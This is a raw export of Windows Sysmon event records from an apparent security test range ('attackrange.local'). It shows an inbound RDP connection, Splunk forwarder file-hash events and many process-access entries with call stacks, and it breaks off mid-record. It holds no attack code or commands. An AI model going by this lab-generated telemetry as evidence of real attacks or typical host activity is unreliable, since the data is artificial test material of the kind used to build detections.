354300x8000000000000000976333Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.449{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-1235-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976332Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.483{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE9AC7A4EC829591C20C20CF724CBFA2,SHA256=B94FE5F507A846AE452FD9AB96D9B6F0F9F5D9D69997D31079E007E6F82B182F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976331Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.296{69CF5F33-882C-6151-7679-00000000FD01}888344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976330Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-882C-6151-7679-00000000FD01}888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976329Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976328Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976327Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976326Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976325Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976324Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976323Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976322Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976321Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976320Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-882C-6151-7679-00000000FD01}888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976319Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.108{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-882C-6151-7679-00000000FD01}888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976318Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:28.093{69CF5F33-882C-6151-7679-00000000FD01}888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976365Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.874{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D45665A5A97A59D99F0A4E670F6578BA,SHA256=176D90E461BB8B761E5565DCA1BB7B9B99E84404D801D4DBABC548C90B62162A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976364Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.780{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F1B31149C2F372AE4B2713F0147E83E,SHA256=E2BFD850A4373C3AEDA9B69BFF01C1633A1EB4FA03718D15624B04DCDF6271BC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:29.951{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:29.920{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D189C928B9578792B2CEC2485C0F88B6,SHA256=B99C8C92BC872006CC13448D8E1F566FC0DC593A9C8ACD4582AE1001298D04F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976363Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.530{69CF5F33-882D-6151-7879-00000000FD01}15721748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976362Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.358{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-882D-6151-7879-00000000FD01}1572C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976361Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.343{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976360Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.343{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976359Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.343{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976358Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.343{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976357Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.343{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976356Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.343{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976355Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.343{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976354Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 